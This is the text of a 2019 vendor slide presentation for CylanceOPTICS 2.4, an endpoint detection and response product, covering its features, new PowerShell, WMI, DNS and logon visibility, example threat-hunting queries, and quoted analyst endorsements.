CylanceOPTICS 2.4Extended Visibility and

Unparalleled Prevention

Matthiew Morin

Senior Product Manager

▪ CylanceOPTICS Overview

▪ What are the key components of

CylanceOPTICS?

▪ What is new in CylanceOPTICS v2.4?

▪ What are experts saying about

CylanceOPTICS?

Agenda

What is CylanceOPTICS?

CylanceOPTICS is the endpoint detection and

response (EDR) component of the BlackBerry

Cylance AI Platform™ that leverages and

augments the prevention delivered by

CylancePROTECT®, providing consistent

visibility required to discover and remediate

hard to find threats.

CylancePROTECT

AI-Native Endpoint

Threat Prevention

DATA S CIE NCE HUM AN E X P E RTIS E

THRE AT RE S E ARCH

Cylance Smart Antivirus™

AI-Powered Protection for

Home and Small Business

CylanceThreatZERO™

Solution Implementation

and Human Expertise

Cylance Consulting

World Class IR, Forensics,

ICS and Red Team Services

CylanceOPTICS

ML-Powered Endpoint

Detection and Response

CylanceGUARD™

Proactive Managed

Detection and Response

CylanceOPTICS: AI-Driven Endpoint Prevention

Source: https://www.gartner.com/reviews/market/endpoint-detection-and-response-solutions

PREVENT

ATTACKS

CONSTANTLY

MONITOR

ENDPOINTS

AUTOMATED

DECISIVE

ACTION

SMART THREAT

HUNTING WITH

INSTAQUERY

TAP INTO

CONTEXTUAL INFO

WITH FOCUS VIEW

How Do Analysts Define EDR?

CylanceOPTICS + Services

▪ Block malicious activity.

▪ Use various data analytics

techniques to detect

suspicious system behavior

D E T E C T I O N

▪ Provide contextual

information.

▪ Record and store endpoint-

system-level behaviors.

I N V E S T I G A T I O N

▪ Use various data analytics

techniques to detect

suspicious system behavior.

C O N T A I N M E N T

▪ Provide remediation

suggestions to restore

affected systems.

R E M E D I A T I O N

Source: https://www.gartner.com/reviews/market/endpoint-detection-and-response-solutions

CylanceOPTICS Does What Others Can’t, Prevention-First EDR

▪ Focus is on preventing the

“unknown unknowns”

▪ Detection is an extension of our

prevention-based security

▪ Adding detection improves our

ability to prevent future attacks

▪ Preventing attacks creates more

time for proactive security

practices

CylanceOPTICS

Features and Benefits

Context Analysis Engine

▪ ML-powered detection on endpoints

▪ Constantly evolving detection logic

provided by Cylance’s Threat Research

team

▪ MITRE ATT&CK

▪ Novel attacks and actors seen in

the field

▪ Highly extensible custom logic exposed

to Users and Partners.

InstaQuery

▪ “Has this been seen in my

environment?”

▪ InstaQuery is a lightweight

analyst query with instant

access to the results

▪ Lets analysts quickly determine

if an endpoint is at risk

USE CASE:

Hunt for the prevalence of

ransomware IOCs throughout

a global environment

Focus View

▪ “How did this Threat get on a

Device?”

▪ Conduct root cause analysis

▪ Automatically gather contextual

evidence on:

▪ Threats

▪ Incidents

▪ Artifacts

USE CASES:

1. See command line arguments

used to decrypt initial

ransomware payloads

2. Observe support files being

introduced by malware

Packages & Playbooks

▪ Package Deploy allows complex

actions to be taken on endpoints at

scale on demand.

▪ Execute applications

▪ Collect artifacts

▪ Playbooks allow the same complex

actions to be taken automatically

when suspicious activity is detected.

▪ Collect additional critical forensic

information as soon as an

incident occurs.

▪ Scripting engine is exposed to Users

and Partners for near-infinite flexibility.

Enhanced Visibility in CylanceOPTICS 2.4

What’s New in CylanceOPTICS 2.4?

1. 2x Visibility into Endpoints

2. 5x Addressable Space with Context Analysis Engine

3. New InstaQuery Artifacts and Facets

4. New Focus View Data Points

What’s New in CylanceOPTICS 2.4?

DNSPowershell

IntrospectionWMI Introspection

Portable Executable

Parsing

Private Address

(RFC 1918 / RFC

4193) Space

Visibility

Windows Logon

Event Visibility

See which Processes

are resolving

domains.

Analyze the resolved

addresses, record

types, and more.

See activity occurring

within a Powershell

Interpreter or ‘novel’

methods of invoking

Powershell.

Analyze the Script

Payloads and

Content.

See activity occurring

within a WMI

Interpreter.

Analyze WMI

Consumers, Event

Filters, and

Referenced Files.

Use CylanceOPTICS

to conduct static

analysis of critical

executable file

information.

Analyze File Version

Information, Functions,

Import Tables, and

more.

Analyzes an

event originating

from a private

internet address

on a TCP/IP

network

Records what has

instigated a

Windows Logon

event, the user that

logged on, by which

IP address and

domain it was

initiated, when it was

initiated, and

artifacts of the

initiation

Enhanced visibility across several key events and focus points:

InstaQuery – DNS Request

▪ Question Name

▪ “Has mydomain.net been seen?”

▪ Record Value

▪ “Has a domain ever resolved to

this?”

InstaQuery – Powershell Trace

▪ Event ID

▪ “Show me all matches for Event

ID 4101.”

▪ Script Block Text

▪ “Has a script executed with this

text in it?”

▪ Payload

▪ “Has a payload or module

executed with this text in it?”

InstaQuery – WMI Trace

▪ Event ID

▪ “Show me all matches for Event

ID 5861.”

▪ Consumer Text

▪ “Has a WMI consumer been

created with this text in it?”

▪ Namespace

▪ “Has a WMI action been taken in

this Namespace?”

▪ Operation

▪ ”Has a WMI operation executed

with this text in it?”

InstaQuery – WMI Trace

▪ Event ID

▪ “Show me all matches for Event

ID 5861.”

▪ Consumer Text

▪ “Has a WMI consumer been

created with this text in it?”

▪ Namespace

▪ “Has a WMI action been taken in

this Namespace?”

▪ Operation

▪ ”Has a WMI operation executed

with this text in it?”

InstaQuery – Windows Event

▪ Event ID

▪ “Show me all matches for Event

ID 4624.”

▪ Provider ID

▪ “Show me all events from the

SecurityAudit provider”

▪ Class

▪ “Show me all ‘LogonLogoff

events.”

What Are Experts Saying About CylanceOPTICS?

Gartner Peer Insights

and Forrester: Total Economic

Impact™ Study

“Cylance is the best of breed in

threat detection and prevention.

Since installing CylancePROTECT

and OPTICS, we can sleep at night.”

— Gartner Peer Insights, April 2019.

In a study by Forrester, CylanceOPTICS▪ Improved the security team’s productivity by 10%

▪ Reduced lost time by 95%

▪ Reduced the expected cost of a major security

breach by 25%

— Forrester: The Total Economic Impact™ study of CylancePROTECT® and CylanceOPTICS™

May 2019

Questions

Answers

© 2 0 1 9 C y l a n c e I n c . A l l R i g h t s R e s e r v e d .